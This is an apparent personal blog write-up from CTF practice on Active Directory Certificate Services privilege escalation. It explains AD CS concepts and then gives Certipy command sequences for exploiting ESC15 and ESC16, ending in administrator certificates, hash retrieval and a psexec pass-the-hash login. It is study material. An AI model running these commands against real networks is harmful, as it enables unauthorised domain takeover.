Introduction:
As I've continued to progress on my Hack The Box (HTB) journey I've always run into intersting ways to escalate privilege, especially while conducting Capture The Flags (CTF's) on Windows Servers. One of those interesting ways of escalating privileges is through Active Directory Certificate Services (AD CS) Certificate Templates and Certificate Service accounts. I've had many cases in which I identified vulnerabilities / attack vectors such as the vulnerabiltiies of ESC15 & ESC16.
I'll be using this oppurtunity to quickly write a Blog-Post which will allow me to document my understanding of AD CS and attack vectors through tools such as Certipy.
What is AD CS?
Active Directory Certificate Services (AD CS) is a critical role within any Active Directory environment. AD CS is primarily used for managing and issuing public key infrastructure (PKI) certificates.
PKI certificates are a critical component for internet & domain security. PKI certificates have multiple uses, focusing on authentication (SSL\TLS), encryption and code signing. Overall the certificates provide a form of identification for accessing internal domain services through secure network protocols.
AD CS automates the certificate life-cycle management process which includes issuing, renewing and revoking certificates.
What is a CA?
Certificate Authority (CA) is a trusted entity that issues digital certificates. The CA is used to verify the identity of individuals, websites or businesses.
Within Active Directory the CA is a service that issues and manages digital certificates used for secure authentication and communication within a network.
What are certificates & certificate templates used for?
AD certificate templates are used to directly define the settings and rules for issuing digital certificates within an AD environment.
Certificate requests that are directed to a CA, will apply the settings and rules to issue/renew a requested certificate ensuring that its valid for the intended use.
How can certificates be used to escalate privilege?
Through applications such as Certipy a powerful toolkit used for both enumeration and exploitation of AD CS. By default Certipy identifies and exploits all know ESC1-ESC16 attack vectors.
For further information on the capabilities of Certipy I would recommend checking this WIKI
Installing Certipy :
Dependencies:
python3
python3-pip
Install via Python:
sudo apt install python3 python3-pip
From a Python venv:
pip install certipy-ad
Alternative:
Directly from APT:
sudo apt install certipy-ad
Checking For Vulnerable Certificate Templates:
Using a Compromised Account and password:
certipy-ad find -vulnerable -u 'ComprimisedAcc' -p 'Password' -dc-ip IPAddress -stdout
Using a Compromised Account and hash:
certipy-ad find -vulnerable -u 'Comprimised Account' -hashes 'NTLM Hash' -dc-ip IPAddress -stdout
The Certipy scan will retrieve important details such as the CA Server and Domain Controller, which I would recommend noting down:
[*] Successfully retrieved CA configuration for 'DOMAIN-CA-1'
[*] Checking web enrollment for CA 'DOMAIN-CA-1' @ 'DC01.DOMAIN.com'
Example Vulnerability Detection:
[!] Vulnerabilities
ESC15: Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15: Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
Please note that even if Certipy detects the vulnerability, it would only be applicable to environments that don't have the vulnerability patched.
Also note while infiltrating a network, it might be beneficial running a Certipy scan without the vulnerable tag, to look at all the potentially vulnerable certificate templates. As this might assist with the direction in which you need to escalate privilege.
Privilege Escalation with ESC15:
ESC15 aka "EKUwu" (CVE-2024-49019) is a AD CS security vulnerability within Microsoft's Extended Key Usage (EKU), under OID 1.3.6.1.4.1.311. ESC15 allows us to specify an Application Policy which isn't listed within the certificate template's EKU. For a example we can request a Vulnerable Template (Which uses Schema Version 1) using the 'Client Authentication' policy' specifying the UPN of any account.
Example Command:
certipy req -ca 'DOMAIN-CA-1' -target-ip 'IPAdress' -u 'CompromisedAcc' -p 'Password' -template "Vulnerable Template Name" -upn "administrator@domain.com" -application-policies 'Client Authentication'
Upon successful execution of this command, you should be presented with a '.pfx' file with the private key detail.
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
From there we can use the 'administrator.pfx' file to authenticate to an LDAP shell with domain admin privileges.
certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shell
Privilege Escalation with ESC16:
Another privilege escalation method is through the configuration flaw within AD CS where the Security Extension is globally disabled. Essentially the security extentsion 'szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2)' is not included in all certificates.
[!] Vulnerabilities
ESC16: Security Extension is disabled.
[*] Remarks
ESC16: Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates:
[!] Could not find any certificate templates
To exploit this we would need to obtain the victim accounts credential cache this can be obtained through Certipy's shadow credential module:
certipy shadow -u 'CompromisedACC' -p 'Password' -dc-ip 'IPAddress' -account 'victim' auto
export KRB5CCNAME=victim.ccache
certipy account -u 'ComprimisedACC' -p 'Password' -dc-ip 'IPAddress' -upn 'administrator' -user 'victim' update
Request a certificate as the “victim” user from any suitable client authentication template (e.g. “User”) via the ESC16-vulnerable Certificate Authority.
certipy req -k -dc-ip 'IPAddress' -target 'DC01.Domain.com' -ca 'Domain-DC01-CA' -template 'User'
Revert back the 'victim' to their original upn, to ensure there are no authentication issues when using the administrator pfx.
certipy account -u 'ComprimisedACC' -p 'Password' -dc-ip 'IPAddress' -upn 'victim@Domain.com' -user 'victim' update
Then we can authenticate as the admin. Using the generated pfx certificate. Providing us the logon hash.
certipy auth -dc-ip 'IpAddress' -pfx 'administrator.pfx' -username 'administrator' -domain 'domain.com'
From there you can use the hash to authenticate onto the target device as administrator.
impacket-psexec -hashes 'HASH' Administrator@IPAddress
References:
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation
https://www.okta.com/identity-101/public-key-infrastructure/
https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc